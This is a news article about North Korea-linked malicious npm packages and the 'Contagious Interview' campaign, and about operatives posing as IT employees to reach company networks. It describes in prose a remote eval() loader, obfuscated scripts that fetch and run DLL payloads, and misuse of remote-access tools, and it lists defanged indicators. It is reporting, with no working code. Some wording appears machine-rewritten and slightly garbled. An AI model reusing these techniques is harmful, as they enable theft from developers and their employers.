Threat actors linked to North Korea have been observed uploading a number of malicious packages to the npm registry, which point to “coordinated and relentless” attempts to infect developers.
A series of malicious packages that threat actors connected to North Korea have been spotted uploading to the npm registry suggest “coordinated and relentless” efforts to infect developers with malware and pilfer bitcoin assets. The most recent wave included the packages temp-etherscan-api, etherscan-api, telegram-con, helmet-validate, and qq-console. It was observed between August 12 and August 27, 2024. Software supply chain security company Phylum stated, “We believe that qq-console is related to the North Korean campaign known as ‘Contagious Interview.’”
The term “contagious interview” describes a persistent effort to infect software developers with malware designed to steal confidential information. This is done by tricking them into downloading phony installers for video conferencing applications like MiroTalk that are hosted on phony websites or phony npm packages. The ultimate objective of the attacks is to launch a Python payload called InvisibleFerret, which is capable of exfiltrating private information from browser extensions for bitcoin wallets and establishing persistence on the host by leveraging reputable remote desktop applications like AnyDesk. The activity is being monitored by CrowdStrike under the pseudonym Famous Chollima.
The recently discovered helmet-validate package takes a different method in that it embeds config.js, a piece of JavaScript code that uses the eval() function to directly run JavaScript located on a remote domain (“ipcheck[.]cloud”). According to Phylum, “our investigation revealed that ipcheck[.]cloud resolves to the same IP address (167[.]88[.]36[.]13) that mirotalk[.]net resolved to when it was online,” suggesting possible connections between the two groups of attacks. The business claimed to have discovered another package, sass-notification, which was uploaded on August 27, 2024, and had similarities to npm libraries that had already been discovered, such as call-blockflow. Moonstone Sleet, another North Korean threat group, has been linked to these parcels.
The use of obfuscated JavaScript to create and run PowerShell and batch scripts is a defining feature of these attacks, according to the statement. “The scripts download and decrypt a remote payload, execute it as a DLL, and then attempt to clean up all traces of malicious activity, leaving behind a seemingly benign package on the victim’s machine.” renowned Chollima Poses as IT Employees in American Companies# The revelation coincides with CrowdStrike’s connection between Famous Chollima (formerly known as BadClone) and insider threat operations, which involve breaking into business settings while posing as employees.
According to the firm, Famous Chollima executed these operations by securing contract work or full-time employment and evading background checks by utilizing stolen or false identity documents. “When applying for a job, these malicious insiders submitted a résumé typically listing previous employment with a prominent company as well as additional lesser-known companies and no employment gaps.” Although the primary motivation for these attacks is money, some of the cases are alleged to have entailed the exfiltration of private data. Over the course of the last year, CrowdStrike claims to have identified the threat actors who have applied to or are currently employed by over 100 distinct firms, the majority of which are situated in the United States, Saudi Arabia, France, the Philippines, and Ukraine, among other countries.
Technology, fintech, financial services, professional services, retail, manufacturing, insurance, pharmaceutical, social media, and media industries are among the prominently targeted sectors. “After obtaining employee-level access to victim networks, the insiders performed minimal tasks related to their job role,” the business continued. The insiders occasionally also tried to exfiltrate data via OneDrive, SharePoint, and Git.” “The RMM tools RustDesk, AnyDesk, TinyPilot, VS Code Dev Tunnels, and Google Chrome Remote Desktop were also installed by the insiders. Then, by using these RMM tools in conjunction with the company’s network credentials, the insiders were able to connect many IP addresses to the victim’s system.”
Also read: Top 3 Workforce Management Companies in India You Should Know
Do Follow: CIO News LinkedIn Account | CIO News Facebook | CIO News Youtube | CIO News Twitter
About us:
CIO News is the premier platform dedicated to delivering the latest news, updates, and insights from the CIO industry. As a trusted source in the technology and IT sector, we provide a comprehensive resource for executives and professionals seeking to stay informed and ahead of the curve. With a focus on cutting-edge developments and trends, CIO News serves as your go-to destination for staying abreast of the rapidly evolving landscape of technology and IT. Founded in June 2020, CIO News has rapidly evolved with ambitious growth plans to expand globally, targeting markets in the Middle East & Africa, ASEAN, USA, and the UK.
CIO News is a proprietary of Mercadeo Multiventures Pvt Ltd.
